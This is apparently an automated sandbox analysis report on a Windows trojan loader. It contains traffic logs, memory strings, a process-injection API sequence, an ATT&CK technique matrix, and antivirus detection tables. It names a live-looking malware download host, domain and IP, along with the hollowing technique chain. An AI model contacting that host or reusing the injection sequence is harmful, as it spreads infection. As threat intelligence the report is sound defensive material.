6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 
79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Wed, 23 Aug 2023 18:16:38 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 
79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Connection: Keep-Alive; Keep-Alive: timeout=5, max=100; cache-control: private, no-cache, no-store, must-revalidate, max-age=0; pragma: no-cache; content-type: text/html; content-length: 708; date: Wed, 23 Aug 2023 18:16:49 GMT; vary: User-Agent
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Connection: Keep-Alive; Keep-Alive: timeout=5, max=100; cache-control: private, no-cache, no-store, must-revalidate, max-age=0; pragma: no-cache; content-type: text/html; content-length: 708; date: Wed, 23 Aug 2023 18:16:58 GMT; vary: User-Agent
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Connection: Keep-Alive; Keep-Alive: timeout=5, max=100; cache-control: private, no-cache, no-store, must-revalidate, max-age=0; pragma: no-cache; content-type: text/html; content-length: 708; date: Wed, 23 Aug 2023 18:17:08 GMT; vary: User-Agent
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Connection: Keep-Alive; Keep-Alive: timeout=5, max=100; cache-control: private, no-cache, no-store, must-revalidate, max-age=0; pragma: no-cache; content-type: text/html; content-length: 708; date: Wed, 23 Aug 2023 18:17:18 GMT; vary: User-Agent
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Connection: Keep-Alive; Keep-Alive: timeout=5, max=100; cache-control: private, no-cache, no-store, must-revalidate, max-age=0; pragma: no-cache; content-type: text/html; content-length: 708; date: Wed, 23 Aug 2023 18:17:28 GMT; vary: User-Agent
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Connection: Keep-Alive; Keep-Alive: timeout=5, max=100; cache-control: private, no-cache, no-store, must-revalidate, max-age=0; pragma: no-cache; content-type: text/html; content-length: 708; date: Wed, 23 Aug 2023 18:17:38 GMT; vary: User-Agent
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Connection: Keep-Alive; Keep-Alive: timeout=5, max=100; cache-control: private, no-cache, no-store, must-revalidate, max-age=0; pragma: no-cache; content-type: text/html; content-length: 708; date: Wed, 23 Aug 2023 18:17:48 GMT; vary: User-Agent
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Connection: Keep-Alive; Keep-Alive: timeout=5, max=100; cache-control: private, no-cache, no-store, must-revalidate, max-age=0; pragma: no-cache; content-type: text/html; content-length: 708; date: Wed, 23 Aug 2023 18:17:58 GMT; vary: User-Agent
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Connection: Keep-Alive; Keep-Alive: timeout=5, max=100; cache-control: private, no-cache, no-store, must-revalidate, max-age=0; pragma: no-cache; content-type: text/html; content-length: 708; date: Wed, 23 Aug 2023 18:18:08 GMT; vary: User-Agent
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Connection: Keep-Alive; Keep-Alive: timeout=5, max=100; cache-control: private, no-cache, no-store, must-revalidate, max-age=0; pragma: no-cache; content-type: text/html; content-length: 708; date: Wed, 23 Aug 2023 18:18:19 GMT; vary: User-Agent
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Connection: Keep-Alive; Keep-Alive: timeout=5, max=100; cache-control: private, no-cache, no-store, must-revalidate, max-age=0; pragma: no-cache; content-type: text/html; content-length: 708; date: Wed, 23 Aug 2023 18:18:28 GMT; vary: User-Agent
            Source: r096teIe1H.exe, 00000000.00000002.761075893.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://://t.exet.exe
            Source: r096teIe1H.exe, 00000000.00000002.761124964.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, r096teIe1H.exe, 00000000.00000003.492188060.0000000000653000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://balkancelikdovme.com/
            Source: r096teIe1H.exe, 00000000.00000002.761124964.00000000005E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://balkancelikdovme.com/LL
            Source: r096teIe1H.exe, 00000000.00000002.762526795.000000000927B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk
            Source: r096teIe1H.exe, 00000000.00000002.761124964.00000000005E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/XezdxpgykmkM
            Source: r096teIe1H.exe, 00000000.00000002.761124964.000000000063F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmkl
            Source: r096teIe1H.exe, 00000000.00000002.761124964.00000000005E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmkl~
            Source: r096teIe1H.exe, 00000000.00000002.761124964.00000000005E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmkp2
            Source: r096teIe1H.exe, 00000000.00000002.761124964.00000000005E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://balkancelikdovme.com/ll
            Source: r096teIe1H.exe, r096teIe1H.exe, 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp, r096teIe1H.exe, 00000000.00000002.761297960.0000000002160000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
            Source: unknownDNS traffic detected: queries for: balkancelikdovme.com
            Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
            Source: r096teIe1H.exe, 00000000.00000002.761124964.00000000005BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>memstr_95373646-5
            Source: r096teIe1H.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: r096teIe1H.exeBinary or memory string: OriginalFilename vs r096teIe1H.exe
            Source: r096teIe1H.exe, 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs r096teIe1H.exe
            Source: r096teIe1H.exe, 00000000.00000002.761297960.0000000002160000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs r096teIe1H.exe
            Source: C:\Users\user\Desktop\r096teIe1H.exeSection loaded: ?????.dllJump to behavior
            Source: C:\Users\user\Desktop\r096teIe1H.exeSection loaded: system.dllJump to behavior
            Source: C:\Users\user\Desktop\r096teIe1H.exeSection loaded: ??l.dllJump to behavior
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_032620C40_2_032620C4
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: String function: 03264698 appears 78 times
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: String function: 03264824 appears 325 times
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_0327D8B0 InetIsOffline,CoInitialize,CoUninitialize,WinExec,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,GetCurrentProcess,FlushInstructionCache,GetCurrentProcess,ExitProcess,0_2_0327D8B0
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_03277B88 GetCurrentProcess,NtProtectVirtualMemory,GetCurrentProcess,NtWriteVirtualMemory,0_2_03277B88
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_0327CBE8 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_0327CBE8
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_0327A6F4 GetModuleHandleW,GetProcAddress,GetCurrentProcess,IsBadReadPtr,IsBadReadPtr,GetCurrentProcess,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,CloseHandle,NtFreeVirtualMemory,GetCurrentProcess,NtFreeVirtualMemory,GetCurrentProcess,NtFreeVirtualMemory,0_2_0327A6F4
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_0327CB04 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_0327CB04
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_03277B14 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_03277B14
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_0327CA74 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_0327CA74
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_03277F54 CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread,0_2_03277F54
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_0327CFB0 CreateProcessAsUserW,NtCreateProcess,WaitForSingleObject,CloseHandle,CloseHandle,0_2_0327CFB0
            Source: r096teIe1H.exeReversingLabs: Detection: 57%
            Source: r096teIe1H.exeVirustotal: Detection: 56%
            Source: C:\Users\user\Desktop\r096teIe1H.exeFile read: C:\Users\user\Desktop\r096teIe1H.exeJump to behavior
            Source: C:\Users\user\Desktop\r096teIe1H.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\r096teIe1H.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Desktop\r096teIe1H.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
            Source: classification engineClassification label: mal96.troj.winEXE@1/0@1/1
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_03276DC0 CoCreateInstance,0_2_03276DC0
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_03267FB6 GetDiskFreeSpaceA,0_2_03267FB6
            Source: C:\Users\user\Desktop\r096teIe1H.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: r096teIe1H.exeStatic file information: File size 1053184 > 1048576

            Data Obfuscation

            Source: Yara matchFile source: r096teIe1H.exe, type: SAMPLE
            Source: Yara matchFile source: 0.2.r096teIe1H.exe.220056c.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.0.r096teIe1H.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.r096teIe1H.exe.3260000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.r096teIe1H.exe.220056c.0.unpack, type: UNPACKEDPE
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_03266374 push 032663CFh; ret 0_2_032663C7
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_03266372 push 032663CFh; ret 0_2_032663C7
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_032632F0 push eax; ret 0_2_0326332C
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_032882F4 push 0328835Fh; ret 0_2_03288357
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_0328C10C push eax; ret 0_2_0328C1DC
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_03288144 push 032881ECh; ret 0_2_032881E4
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_032881F8 push 03288288h; ret 0_2_03288280
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_03273050 push 0327309Dh; ret 0_2_03273095
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_032880AC push 03288125h; ret 0_2_0328811D
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_0327A08C push 0327A0C4h; ret 0_2_0327A0BC
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_03266766 push 032667AAh; ret 0_2_032667A2
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_03266768 push 032667AAh; ret 0_2_032667A2
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_03287508 push 03287720h; ret 0_2_03287718
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_0326C550 push ecx; mov dword ptr [esp], edx0_2_0326C555
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_0326D584 push 0326D5B0h; ret 0_2_0326D5A8
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_0327D4EC push ecx; mov dword ptr [esp], edx0_2_0327D4F1
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_0326CBD0 push 0326CD56h; ret 0_2_0326CD4E
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_03277904 push 03277981h; ret 0_2_03277979
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_03276940 push 032769EBh; ret 0_2_032769E3
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_0327C95C push 0327C994h; ret 0_2_0327C98C
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_03272F44 push 03272FBAh; ret 0_2_03272FB2
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_03277B14 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_03277B14
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_0327A0C8 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0327A0C8
            Source: C:\Users\user\Desktop\r096teIe1H.exe TID: 7044Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\r096teIe1H.exe TID: 7044Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_032658CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_032658CC
            Source: r096teIe1H.exe, 00000000.00000002.761124964.00000000005E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH4c%SystemRoot%\system32\mswsock.dll
            Source: r096teIe1H.exe, 00000000.00000002.761124964.000000000063F000.00000004.00000020.00020000.00000000.sdmp, r096teIe1H.exe, 00000000.00000002.761124964.000000000062D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_03265A90
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: GetLocaleInfoA,0_2_0326A7A8
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: GetLocaleInfoA,0_2_0326A7F4
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_03265B9C
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_0326B770 GetVersionExA,0_2_0326B770
            Source: C:\Users\user\Desktop\r096teIe1H.exeCode function: 0_2_032691F0 GetLocalTime,0_2_032691F0
            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            1 Valid Accounts | 1 Native API | 1 Valid Accounts | 1 Valid Accounts | 1 Valid Accounts | 1 Input Capture | 1 System Time Discovery | Remote Services | 1 Input Capture | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 Access Token Manipulation | 1 Virtualization/Sandbox Evasion | LSASS Memory | 1 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | 3 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | At (Linux) | Logon Script (Windows) | 1 DLL Side-Loading | 1 Access Token Manipulation | Security Account Manager | 1 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 3 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 113 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 DLL Side-Loading | Cached Domain Credentials | 14 System Information Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
            Source | Detection | Scanner | Label
            r096teIe1H.exe | 58% | ReversingLabs | Win32.Trojan.Leonem
            r096teIe1H.exe | 57% | Virustotal |
            r096teIe1H.exe | 100% | Avira | TR/Redcap.zvjcd
            r096teIe1H.exe | 100% | Joe Sandbox ML |
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label
            balkancelikdovme.com | 18% | Virustotal |
            Source | Detection | Scanner | Label
            http://://t.exet.exe | 0% | Avira URL Cloud | safe
            http://balkancelikdovme.com/LL | 100% | Avira URL Cloud | malware
            http://balkancelikdovme.com/ | 18% | Virustotal |
            http://balkancelikdovme.com/ | 100% | Avira URL Cloud | malware
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            balkancelikdovme.com | 185.181.116.217 | true | true | | unknown
            Name | Source | Malicious | Antivirus Detection | Reputation
            http://://t.exet.exe | r096teIe1H.exe, 00000000.00000002.761075893.000000000019B000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
            http://balkancelikdovme.com/ | r096teIe1H.exe, 00000000.00000002.761124964.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, r096teIe1H.exe, 00000000.00000003.492188060.0000000000653000.00000004.00000020.00020000.00000000.sdmp | true | 18%, Virustotal; Avira URL Cloud: malware | unknown
            http://www.pmail.com | r096teIe1H.exe, r096teIe1H.exe, 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp, r096teIe1H.exe, 00000000.00000002.761297960.0000000002160000.00000004.00001000.00020000.00000000.sdmp | false | | high
            http://balkancelikdovme.com/LL | r096teIe1H.exe, 00000000.00000002.761124964.00000000005E5000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
            http://balkancelikdovme.com/ll | r096teIe1H.exe, 00000000.00000002.761124964.00000000005E5000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                IP | Domain | Country | ASN | ASN Name | Malicious
                185.181.116.217 | balkancelikdovme.com | United Kingdom | 29017 | GYRONGB | true
                Joe Sandbox Version:38.0.0 Beryl
                Analysis ID:1296092
                Start date and time:2023-08-23 20:14:35 +02:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 8m 25s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Run name:Run with higher sleep bypass
                Number of analysed new started processes analysed:19
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample file name:r096teIe1H.exe
                Original Sample Name:53e4ef9bed0e669de506d72e339fa3f36534aef9d10519491d0f0acea27b8841.exe
                Detection:MAL
                Classification:mal96.troj.winEXE@1/0@1/1
                EGA Information:Failed
                HDC Information:
                • Successful, ratio: 28.6% (good quality ratio 27.9%)
                • Quality average: 78.2%
                • Quality standard deviation: 22.9%
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 21
                • Number of non-executed functions: 41
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, client.wns.windows.com, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, g.bing.com, arc.msn.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtOpenFile calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryAttributesFile calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                No simulations
                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                185.181.116.217 | 0vJrK0NCd1.exe | malicious | Remcos, DBatLoader, FloodFix |
                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                balkancelikdovme.com | 0vJrK0NCd1.exe | malicious | Remcos, DBatLoader, FloodFix | 185.181.116.217
                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                GYRONGB | 0vJrK0NCd1.exe | malicious | Remcos, DBatLoader, FloodFix | 185.181.116.217
                  No context
                  No context
                  No created / dropped files found
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.349529449609779
                  TrID:
